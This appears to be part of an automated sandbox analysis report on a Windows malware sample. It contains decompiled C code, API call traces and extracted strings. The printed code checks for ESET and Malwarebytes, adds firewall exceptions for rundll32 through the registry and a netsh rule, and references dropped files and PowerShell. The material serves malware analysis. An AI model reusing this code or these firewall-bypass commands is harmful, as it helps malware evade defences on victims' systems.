                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 00401591
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 0040159B
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004015A5
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004015AF
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004015B9
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004015C3
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004015CD
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004015D7
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004015E1
                                                                • RtlExitUserThread.NTDLL(00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000,00000000), ref: 004015EB
                                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\ESET,00000000,00020019,004433FC,00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000), ref: 00401A20
                                                                • ExitThread.KERNEL32(80000001,Software\ESET,00000000,00020019,004433FC,00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000), ref: 00401A29
                                                                • RegOpenKeyExA.ADVAPI32(80000002,SYSTEM\ControlSet001\Services\MBAMService,00000000,00020019,004433FC,80000001,Software\ESET,00000000,00020019,004433FC,00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d), ref: 00401A45
                                                                • ExitThread.KERNEL32(80000002,SYSTEM\ControlSet001\Services\MBAMService,00000000,00020019,004433FC,80000001,Software\ESET,00000000,00020019,004433FC,00100000,00000000,2707952b-6f11-481e-99be-b28317af8e3d,?,?,52b-6f11-481e-99be-b28317af8e3d), ref: 00401A4E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.811078300.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000D.00000002.811102499.000000000043C000.00000040.00020000.sdmp
                                                                • Associated: 0000000D.00000002.811121010.0000000000443000.00000040.00020000.sdmp
                                                                • Associated: 0000000D.00000002.811136166.0000000000446000.00000040.00020000.sdmp
                                                                • Associated: 0000000D.00000002.811154545.000000000044A000.00000040.00020000.sdmp
                                                                Similarity
                                                                • API ID: Exit$Thread$User$Open$Mutex$Process$AllocCreateHeap
                                                                • API String ID: 3445501446-3183811682
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 45%
                                                                			E004024B7(void* __eax) {
                                                                				intOrPtr _v4;
                                                                				char _v5;
                                                                				char _v6;
                                                                				void* _t18;
                                                                				intOrPtr _t25;
                                                                				CHAR* _t27;
                                                                				long _t40;
                                                                				struct HINSTANCE__* _t43;
                                                                				intOrPtr* _t50;
                                                                				void* _t52;
                                                                				intOrPtr _t58;
                                                                				CHAR* _t60;
                                                                				char* _t61;
                                                                				signed int _t63;
                                                                				int _t71;
                                                                				int _t72;
                                                                				void* _t78;
                                                                				void* _t79;
                                                                				intOrPtr _t80;
                                                                				signed char* _t82;
                                                                				signed char* _t83;
                                                                				void* _t85;
                                                                				void* _t86;
                                                                				CHAR* _t88;
                                                                				CHAR* _t89;
                                                                				CHAR* _t90;
                                                                				CHAR* _t92;
                                                                				char* _t93;
                                                                				signed char* _t96;
                                                                				CHAR* _t97;
                                                                				void* _t100;
                                                                				intOrPtr* _t101;
                                                                
                                                                				_t79 =  *0x440860; // 0x36a1020
                                                                				_t96 = 0x402b63;
                                                                				_t1 = _t79 + 0x408; // 0x36a1428
                                                                				_t58 = _t1;
                                                                				_t78 = 0x14b;
                                                                				_t18 = 0;
                                                                				do {
                                                                					asm("lodsb");
                                                                					if(_t18 != 0x17) {
                                                                						asm("stosb");
                                                                						goto L5;
                                                                					}
                                                                					_t63 =  *_t96 & 0x000000ff;
                                                                					_t18 = memset(_t79, 0, _t63 << 0);
                                                                					_t100 = _t100 + 0xc;
                                                                					_t79 = _t79 + _t63;
                                                                					_t96 =  &(_t96[1]);
                                                                					_t78 = _t78 - 1;
                                                                					if(_t78 == 0) {
                                                                						break;
                                                                					} else {
                                                                					}
                                                                					L5:
                                                                					_t78 = _t78 - 1;
                                                                				} while (_t78 != 0);
                                                                				_t80 = _t58;
                                                                				asm("lodsb");
                                                                				asm("stosb");
                                                                				asm("loop 0xfffffffe");
                                                                				 *0x43f5a2 = _t80;
                                                                				asm("lodsb");
                                                                				asm("stosb");
                                                                				asm("loop 0xfffffffe");
                                                                				_t82 = _t80;
                                                                				 *_t82 =  ~( *_t82);
                                                                				asm("rol byte [edi], 1");
                                                                				 *_t82 =  ~( *_t82);
                                                                				_t83 =  &(_t82[1]);
                                                                				 *_t83 =  ~( *_t83);
                                                                				asm("rol byte [edi], 0x6");
                                                                				 *_t83 =  ~( *_t83);
                                                                				asm("loop 0xfffffff1");
                                                                				_t85 = _t82;
                                                                				_t86 = _t85 - 4;
                                                                				 *((intOrPtr*)(_t86 - 4)) = 0xe1df0233;
                                                                				memset(_t86, 0, 8 << 0);
                                                                				_t101 = _t100 + 0xc;
                                                                				_push(_t96);
                                                                				_push(_t79);
                                                                				_t60 = _t86 + 8;
                                                                				_t88 = GetCommandLineA();
                                                                				_t71 = lstrlenA(_t88);
                                                                				while(1) {
                                                                					asm("repne scasb");
                                                                					if(_t71 == 0) {
                                                                						break;
                                                                					}
                                                                					if( *_t88 != 0x69627573) {
                                                                						continue;
                                                                					} else {
                                                                						_t89 =  &(_t88[6]);
                                                                						_t97 = _t89;
                                                                						asm("repne scasb");
                                                                						if( *((char*)(_t89 - 1)) == 0x20) {
                                                                							 *((char*)(_t89 - 1)) = 0;
                                                                						}
                                                                						_t25 = E0043C890(_t97);
                                                                						 *0x43f3bc = _t89;
                                                                						_t90 = _t60;
                                                                						 *0x440250 = _t25;
                                                                						asm("stosd");
                                                                						lstrcpyA(_t90, _t97);
                                                                						_t27 =  *0x43f3bc; // 0x753499
                                                                						 *((char*)(_t27 - 1)) = 0x20;
                                                                						_t61 =  &(_t90[0x32]);
                                                                						_t92 = GetCommandLineA();
                                                                						_t72 = lstrlenA(_t92);
                                                                						while(1) {
                                                                							asm("repne scasb");
                                                                							if(_t72 == 0) {
                                                                								break;
                                                                							}
                                                                							if( *_t92 != 0x69627570 || _t92[4] != 0x3d64) {
                                                                								continue;
                                                                							} else {
                                                                								if((_t92[6] & 0x000000ff) == 0x20) {
                                                                								}
                                                                								L24:
                                                                								_t93 = _t61;
                                                                								asm("stosb");
                                                                								asm("stosd");
                                                                								asm("stosd");
                                                                								asm("stosd");
                                                                								asm("stosb");
                                                                								RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", 0, 0x20019, 0x440398); // executed
                                                                								 *0x440394 = 0x100;
                                                                								RegQueryValueExA( *0x440398, "ProductName", 0, 0x443400, "Windows 10 Enterprise", 0x440394); // executed
                                                                								RegCloseKey( *0x440398); // executed
                                                                								_t40 = GetVersion();
                                                                								if(_t40 != 5) {
                                                                									L27:
                                                                									if(_t40 != 5 || _t40 != 1) {
                                                                										if(_t40 != 6) {
                                                                											L33:
                                                                											if(_t40 != 6 || _t40 != 1) {
                                                                												if(_t40 != 6 || _t40 != 2) {
                                                                													if(_t40 != 6 || _t40 != 3) {
                                                                														if(_t40 != 6 || _t40 != 4) {
                                                                															if(_t40 == 0xa) {
                                                                															}
                                                                														}
                                                                													}
                                                                												}
                                                                											}
                                                                											goto L47;
                                                                										}
                                                                										_t40 = _t40;
                                                                										if(_t40 != 0) {
                                                                											goto L33;
                                                                										}
                                                                										goto L47;
                                                                									} else {
                                                                										L47:
                                                                										if( *0x44029c == 0x31) {
                                                                										}
                                                                										asm("stosb");
                                                                										_t43 = GetModuleHandleA("kernel32");
                                                                										if(_t43 == 0) {
                                                                											asm("stosb");
                                                                										} else {
                                                                											_t50 = GetProcAddress(_t43, "IsWow64Process");
                                                                											if(_t50 == 0 || _t50 == 0xffffffff) {
                                                                												asm("stosb");
                                                                											} else {
                                                                												_t52 = GetCurrentProcess();
                                                                												 *_t50(0x440254, _t93);
                                                                												_t93 = _t52;
                                                                												asm("stosb");
                                                                											}
                                                                										}
                                                                										if( *0x4433cf != 0) {
                                                                										}
                                                                										asm("stosb");
                                                                										asm("pushad");
                                                                										asm("lodsw");
                                                                										asm("rol ax, 0xd");
                                                                										asm("stosw");
                                                                										asm("loop 0xfffffff8");
                                                                										asm("popad");
                                                                										E004027CD();
                                                                										ExitProcess(??);
                                                                										if(0x4468ea <= 0) {
                                                                											ExitProcess();
                                                                											return 0x4468ea;
                                                                										} else {
                                                                											_push(0x4468ea);
                                                                											_push(_t78);
                                                                											_push(2);
                                                                											_v6 = 0x52;
                                                                											_v6 = _v6 - 5;
                                                                											_v5 = 0x5a;
                                                                											_v4 = 0x30090;
                                                                											_push(0x55fb);
                                                                											_push( *0x440860);
                                                                											 *_t101 =  *_t101 - 0xeac38f;
                                                                											 *_t101 =  *_t101 + 0xeac391;
                                                                											 *_t101 =  *_t101 + 3;
                                                                											_push(0x4468ea);
                                                                											_push(5);
                                                                											_push(_t101 + 0x12);
                                                                											_push(0x4468ea);
                                                                											_push(0x4027f1);
                                                                											 *_t101 =  *_t101 + 1;
                                                                											return 0x4468ea;
                                                                										}
                                                                									}
                                                                								}
                                                                								_t40 = _t40;
                                                                								if(_t40 != 0) {
                                                                									goto L27;
                                                                								}
                                                                								goto L47;
                                                                							}
                                                                						}
                                                                						goto L24;
                                                                					}
                                                                				}
                                                                				L14:
                                                                				_t96 =  &(_t96[1]);
                                                                				goto L14;
                                                                			}

                                                                APIs
                                                                • GetCommandLineA.KERNEL32(036A1428,003F1319,00401FDD,C:\Users\user\AppData\Local\Temp\oh161a161.bat,C:\Users\user\AppData\Local\Temp\oh161a161.bat,oh161a161.bat,000001F4,C:\Users\user\AppData\Local\Temp\oh161a161.bat,00001388,kernel32,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,00000000,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91), ref: 0040253F
                                                                • lstrlenA.KERNEL32(00000000,036A1428,003F1319,00401FDD,C:\Users\user\AppData\Local\Temp\oh161a161.bat,C:\Users\user\AppData\Local\Temp\oh161a161.bat,oh161a161.bat,000001F4,C:\Users\user\AppData\Local\Temp\oh161a161.bat,00001388,kernel32,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,00000000), ref: 00402547
                                                                • lstrcpyA.KERNEL32(036A101C,-00000006,00000000,036A1428,003F1319,00401FDD,C:\Users\user\AppData\Local\Temp\oh161a161.bat,C:\Users\user\AppData\Local\Temp\oh161a161.bat,oh161a161.bat,000001F4,C:\Users\user\AppData\Local\Temp\oh161a161.bat,00001388,kernel32,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91), ref: 0040259B
                                                                • GetCommandLineA.KERNEL32(036A101C,-00000006,00000000,036A1428,003F1319,00401FDD,C:\Users\user\AppData\Local\Temp\oh161a161.bat,C:\Users\user\AppData\Local\Temp\oh161a161.bat,oh161a161.bat,000001F4,C:\Users\user\AppData\Local\Temp\oh161a161.bat,00001388,kernel32,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91), ref: 004025AE
                                                                • lstrlenA.KERNEL32(00000000,036A101C,-00000006,00000000,036A1428,003F1319,00401FDD,C:\Users\user\AppData\Local\Temp\oh161a161.bat,C:\Users\user\AppData\Local\Temp\oh161a161.bat,oh161a161.bat,000001F4,C:\Users\user\AppData\Local\Temp\oh161a161.bat,00001388,kernel32,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91), ref: 004025B6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.811078300.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 0000000D.00000002.811102499.000000000043C000.00000040.00020000.sdmp
                                                                 • Associated: 0000000D.00000002.811121010.0000000000443000.00000040.00020000.sdmp
                                                                 • Associated: 0000000D.00000002.811136166.0000000000446000.00000040.00020000.sdmp
                                                                 • Associated: 0000000D.00000002.811154545.000000000044A000.00000040.00020000.sdmp
                                                                Similarity
                                                                • API ID: CommandLinelstrlen$lstrcpy
                                                                • String ID: C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll$IsWow64Process$ProductName$R$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Windows 10 Enterprise$Z$kernel32$pubi$subi
                                                                • API String ID: 2924811697-2946237119
                                                                • Opcode ID: 36d645abd151f9e79aa7af88d9b6d85c25858b58ca497b901fa78fc891b05d52
                                                                • Instruction ID: 3f9592e861b59049e43669ab2c2c85c784bb6e17a0021f1f39863acaefa6db71
                                                                • Opcode Fuzzy Hash: 36d645abd151f9e79aa7af88d9b6d85c25858b58ca497b901fa78fc891b05d52
                                                                • Instruction Fuzzy Hash: 5E816730A04201A7EF255729CE5D73B6A959B9A314F20443FE685B73D2CBFD8C528B0E
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 96%
                                                                			E0040110C(CHAR* __edx) {
                                                                				signed int _t7;
                                                                				void* _t9;
                                                                				void* _t18;
                                                                				CHAR* _t30;
                                                                
                                                                				_t30 = __edx;
                                                                				_t7 = GetVersion();
                                                                				if(_t7 >= 6) {
                                                                					_t9 = E004029FB();
                                                                					if(_t9 < 0 || _t9 >= 0x3000) {
                                                                						 *0x43f5e9 = 0x6e65706f;
                                                                						 *0x43f5ed = 0;
                                                                					} else {
                                                                						 *0x43f5e9 = 0x616e7572;
                                                                						 *0x43f5ed = 0x73;
                                                                					}
                                                                					 *0x447267 = 0x3c;
                                                                					 *0x0044726B = 0x40;
                                                                					 *0x00447273 = 0x43f5e9;
                                                                					 *((intOrPtr*)(0x447277)) = "netsh.exe";
                                                                					 *((intOrPtr*)(0x44727b)) = "advfirewall firewall add rule name=\"Rundll32\" dir=out action=allow protocol=any program=\"C:\\Windows\\system32\\rundll32.exe\"";
                                                                					 *0x00447283 = 0;
                                                                					GetVersion();
                                                                					GetWindowsDirectoryA("C:\Users\jones\AppData\Local\Temp\cyscuq0veku\safebits.exe", 0x3e8);
                                                                					if( *((char*)(lstrlenA(?str?) - 1 + 0x44039c)) != 0x5c) {
                                                                						lstrcatA("C:\Users\jones\AppData\Local\Temp\cyscuq0veku\safebits.exe", "\\system32\\WindowsPowershell\\v1.0\\powershell.exe");
                                                                					} else {
                                                                						lstrcatA("C:\Users\jones\AppData\Local\Temp\cyscuq0veku\safebits.exe", "system32\\WindowsPowershell\\v1.0\\powershell.exe");
                                                                					}
                                                                				} else {
                                                                					_t30 = _t30 ^ _t7;
                                                                					"GirewallPolicy\\StandardProfile\\AuthorizedApplications\\List" = "GirewallPolicy\\StandardProfile\\AuthorizedApplications\\List" - 1;
                                                                					RegCreateKeyExA(0x80000002, "SYSTEM\\ControlSet001\\Services\\SharedAccess\\Parameters\\GirewallPolicy\\StandardProfile\\AuthorizedApplications\\List", 0, 0, 0, 0xf003f, 0, 0x4433fc, 0x443400);
                                                                					lstrcpyA(0x440864, 0x4496d3);
                                                                					lstrcpyA(0x440c4c, 0x4496d3);
                                                                					lstrcatA(0x440c4c, ":*:Enabled:rundll32");
                                                                					E0040247D(0x440864, 1, 0x440c4c, lstrlenA(0x440c4c));
                                                                					RegCloseKey( *0x4433fc);
                                                                				}
                                                                				 *0x43f5c2 = 1;
                                                                				ExitThread(0); // executed
                                                                				_t18 = OpenMutexA(0x100000, 0, _t30);
                                                                				if(_t18 != 0) {
                                                                					ExitProcess();
                                                                					return _t18;
                                                                				}
                                                                				return _t18;
                                                                 			}

                                                                APIs
                                                                • GetVersion.KERNEL32 ref: 0040110C
                                                                • RegCreateKeyExA.ADVAPI32(80000002,SYSTEM\ControlSet001\Services\SharedAccess\Parameters\GirewallPolicy\StandardProfile\AuthorizedApplications\List,00000000,00000000,00000000,000F003F,00000000,004433FC,00443400), ref: 00401144
                                                                • lstrcpyA.KERNEL32(00440864,004496D3,80000002,SYSTEM\ControlSet001\Services\SharedAccess\Parameters\GirewallPolicy\StandardProfile\AuthorizedApplications\List,00000000,00000000,00000000,000F003F,00000000,004433FC,00443400), ref: 00401153
                                                                • lstrcpyA.KERNEL32(00440C4C,004496D3,00440864,004496D3,80000002,SYSTEM\ControlSet001\Services\SharedAccess\Parameters\GirewallPolicy\StandardProfile\AuthorizedApplications\List,00000000,00000000,00000000,000F003F,00000000,004433FC,00443400), ref: 00401162
                                                                • lstrcatA.KERNEL32(00440C4C,:*:Enabled:rundll32,00440C4C,004496D3,00440864,004496D3,80000002,SYSTEM\ControlSet001\Services\SharedAccess\Parameters\GirewallPolicy\StandardProfile\AuthorizedApplications\List,00000000,00000000,00000000,000F003F,00000000,004433FC,00443400), ref: 00401171
                                                                • lstrlenA.KERNEL32(00440C4C,00440C4C,:*:Enabled:rundll32,00440C4C,004496D3,00440864,004496D3,80000002,SYSTEM\ControlSet001\Services\SharedAccess\Parameters\GirewallPolicy\StandardProfile\AuthorizedApplications\List,00000000,00000000,00000000,000F003F,00000000,004433FC,00443400), ref: 0040117B
                                                                  • Part of subcall function 0040247D: RegSetValueExA.ADVAPI32(?,00008EDA,?,?,?,?,?,00401192,00440864,00000001,00440C4C,00000000,00440C4C,00440C4C,:*:Enabled:rundll32,00440C4C), ref: 004024A7
                                                                • RegCloseKey.ADVAPI32(00440864,00000001,00440C4C,00000000,00440C4C,00440C4C,:*:Enabled:rundll32,00440C4C,004496D3,00440864,004496D3,80000002,SYSTEM\ControlSet001\Services\SharedAccess\Parameters\GirewallPolicy\StandardProfile\AuthorizedApplications\List,00000000,00000000,00000000), ref: 00401198
                                                                • GetVersion.KERNEL32 ref: 0040120F
                                                                • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,000003E8), ref: 0040122B
                                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,000003E8), ref: 00401235
                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,system32\WindowsPowershell\v1.0\powershell.exe,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,000003E8), ref: 0040124E
                                                                • ExitThread.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,\system32\WindowsPowershell\v1.0\powershell.exe,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,000003E8), ref: 0040126D
                                                                • OpenMutexA.KERNEL32 ref: 0040127B
                                                                • ExitProcess.KERNEL32(00100000,00000000,UEFIConfig,004012FD,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000), ref: 00401284
                                                                Strings
                                                                • \system32\WindowsPowershell\v1.0\powershell.exe, xrefs: 00401255
                                                                • advfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe", xrefs: 004011FF
                                                                • netsh.exe, xrefs: 004011F8
                                                                • C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe, xrefs: 00401226, 00401230, 00401249, 0040125A
                                                                • :*:Enabled:rundll32, xrefs: 00401167
                                                                • SYSTEM\ControlSet001\Services\SharedAccess\Parameters\GirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 0040113A
                                                                • UEFIConfig, xrefs: 00401272
                                                                • open, xrefs: 004011BB, 004011F1
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.811078300.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 0000000D.00000002.811102499.000000000043C000.00000040.00020000.sdmp
                                                                 • Associated: 0000000D.00000002.811121010.0000000000443000.00000040.00020000.sdmp
                                                                 • Associated: 0000000D.00000002.811136166.0000000000446000.00000040.00020000.sdmp
                                                                 • Associated: 0000000D.00000002.811154545.000000000044A000.00000040.00020000.sdmp
                                                                Similarity
                                                                • API ID: ExitVersionlstrcatlstrcpylstrlen$CloseCreateDirectoryMutexOpenProcessThreadValueWindows
                                                                • String ID: :*:Enabled:rundll32$C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe$SYSTEM\ControlSet001\Services\SharedAccess\Parameters\GirewallPolicy\StandardProfile\AuthorizedApplications\List$UEFIConfig$\system32\WindowsPowershell\v1.0\powershell.exe$advfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe"$netsh.exe$open
                                                                • API String ID: 1502339761-2775499601
                                                                • Opcode ID: ca51713fc446da2fce98747e96986a45f3f431a4da9714b60dfa7991cbd6e5f3
                                                                • Instruction ID: f86a099ff20220eadf8bc6d75ab3a4ac57e3fb5b0f73ee9d2750b17cc6049df9
                                                                • Opcode Fuzzy Hash: ca51713fc446da2fce98747e96986a45f3f431a4da9714b60dfa7991cbd6e5f3
                                                                • Instruction Fuzzy Hash: 9921A270BA0340BAE7187F629C87F5829859B08B09F20647FB6417A1E3CBFC4215476E
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 33%
                                                                			E0040258C(CHAR* __ebx, void* __edx, CHAR* __esi, char _a2, char _a3, intOrPtr _a4) {
                                                                				intOrPtr _t11;
                                                                				long _t24;
                                                                				struct HINSTANCE__* _t27;
                                                                				intOrPtr* _t34;
                                                                				void* _t36;
                                                                				char* _t42;
                                                                				int _t44;
                                                                				void* _t50;
                                                                				CHAR* _t53;
                                                                				char* _t54;
                                                                				intOrPtr* _t59;
                                                                
                                                                				_t50 = __edx;
                                                                				 *0x440250 = 0;
                                                                				asm("stosd");
                                                                				lstrcpyA(__ebx, __esi);
                                                                				_t11 =  *0x43f3bc; // 0x753499
                                                                				 *((char*)(_t11 - 1)) = 0x20;
                                                                				_t42 =  &(__ebx[0x32]);
                                                                				_t53 = GetCommandLineA();
                                                                				_t44 = lstrlenA(_t53);
                                                                				while(1) {
                                                                					asm("repne scasb");
                                                                					if(_t44 == 0) {
                                                                						break;
                                                                					}
                                                                					if( *_t53 != 0x69627570 || _t53[4] != 0x3d64) {
                                                                						continue;
                                                                					} else {
                                                                						if((_t53[6] & 0x000000ff) != 0x20) {
                                                                						}
                                                                						break;
                                                                					}
                                                                				}
                                                                				_t54 = _t42;
                                                                				asm("stosb");
                                                                				asm("stosd");
                                                                				asm("stosd");
                                                                				asm("stosd");
                                                                				asm("stosb");
                                                                				RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", 0, 0x20019, 0x440398); // executed
                                                                				 *0x440394 = 0x100;
                                                                				RegQueryValueExA( *0x440398, "ProductName", 0, 0x443400, "Windows 10 Enterprise", 0x440394); // executed
                                                                				RegCloseKey( *0x440398); // executed
                                                                				_t24 = GetVersion();
                                                                				if(_t24 != 5) {
                                                                					L13:
                                                                					if(_t24 != 5 || _t24 != 1) {
                                                                						if(_t24 != 6) {
                                                                							L19:
                                                                							if(_t24 != 6 || _t24 != 1) {
                                                                								if(_t24 != 6 || _t24 != 2) {
                                                                									if(_t24 != 6 || _t24 != 3) {
                                                                										if(_t24 != 6 || _t24 != 4) {
                                                                											if(_t24 == 0xa) {
                                                                											}
                                                                										}
                                                                									}
                                                                								}
                                                                							}
                                                                							goto L33;
                                                                						}
                                                                						_t24 = _t24;
                                                                						if(_t24 != 0) {
                                                                							goto L19;
                                                                						}
                                                                						goto L33;
                                                                					} else {
                                                                						L33:
                                                                						if( *0x44029c == 0x31) {
                                                                						}
                                                                						asm("stosb");
                                                                						_t27 = GetModuleHandleA("kernel32");
                                                                						if(_t27 == 0) {
                                                                							asm("stosb");
                                                                						} else {
                                                                							_t34 = GetProcAddress(_t27, "IsWow64Process");
                                                                							if(_t34 == 0 || _t34 == 0xffffffff) {
                                                                								asm("stosb");
                                                                							} else {
                                                                								_t36 = GetCurrentProcess();
                                                                								 *_t34(0x440254, _t54);
                                                                								_t54 = _t36;
                                                                								asm("stosb");
                                                                							}
                                                                						}
                                                                						if( *0x4433cf != 0) {
                                                                						}
                                                                						asm("stosb");
                                                                						asm("pushad");
                                                                						asm("lodsw");
                                                                						asm("rol ax, 0xd");
                                                                						asm("stosw");
                                                                						asm("loop 0xfffffff8");
                                                                						asm("popad");
                                                                						E004027CD();
                                                                						ExitProcess(??);
                                                                						if(0x4468ea <= 0) {
                                                                							ExitProcess();
                                                                							return 0x4468ea;
                                                                						} else {
                                                                							_push(0x4468ea);
                                                                							_push(_t50);
                                                                							_push(2);
                                                                							_a2 = 0x52;
                                                                							_a2 = _a2 - 5;
                                                                							_a3 = 0x5a;
                                                                							_a4 = 0x30090;
                                                                							_push(0x55fb);
                                                                							_push( *0x440860);
                                                                							 *_t59 =  *_t59 - 0xeac38f;
                                                                							 *_t59 =  *_t59 + 0xeac391;
                                                                							 *_t59 =  *_t59 + 3;
                                                                							_push(0x4468ea);
                                                                							_push(5);
                                                                							_push(_t59 + 0x12);
                                                                							_push(0x4468ea);
                                                                							_push(0x4027f1);
                                                                							 *_t59 =  *_t59 + 1;
                                                                							return 0x4468ea;
                                                                						}
                                                                					}
                                                                				}
                                                                				_t24 = _t24;
                                                                				if(_t24 != 0) {
                                                                					goto L13;
                                                                				}
                                                                				goto L33;
                                                                 			}
                                                                0x004026fe
                                                                0x0040273c
                                                                0x00402700
                                                                0x0040270b
                                                                0x0040270d
                                                                0x00402734
                                                                0x00402714
                                                                0x00402717
                                                                0x00402722
                                                                0x00402724
                                                                0x0040272c
                                                                0x0040272c
                                                                0x0040270d
                                                                0x00402744
                                                                0x00402744
                                                                0x00402752
                                                                0x00402753
                                                                0x0040275b
                                                                0x0040275d
                                                                0x00402761
                                                                0x00402763
                                                                0x00402765
                                                                0x00402766
                                                                0x00402775
                                                                0x0040277c
                                                                0x00402a4b
                                                                0x00402a56
                                                                0x00402782
                                                                0x00402782
                                                                0x00402783
                                                                0x00402784
                                                                0x00402785
                                                                0x0040278a
                                                                0x0040278f
                                                                0x00402794
                                                                0x0040279c
                                                                0x004027a1
                                                                0x004027a7
                                                                0x004027ae
                                                                0x004027b5
                                                                0x004027b9
                                                                0x004027ba
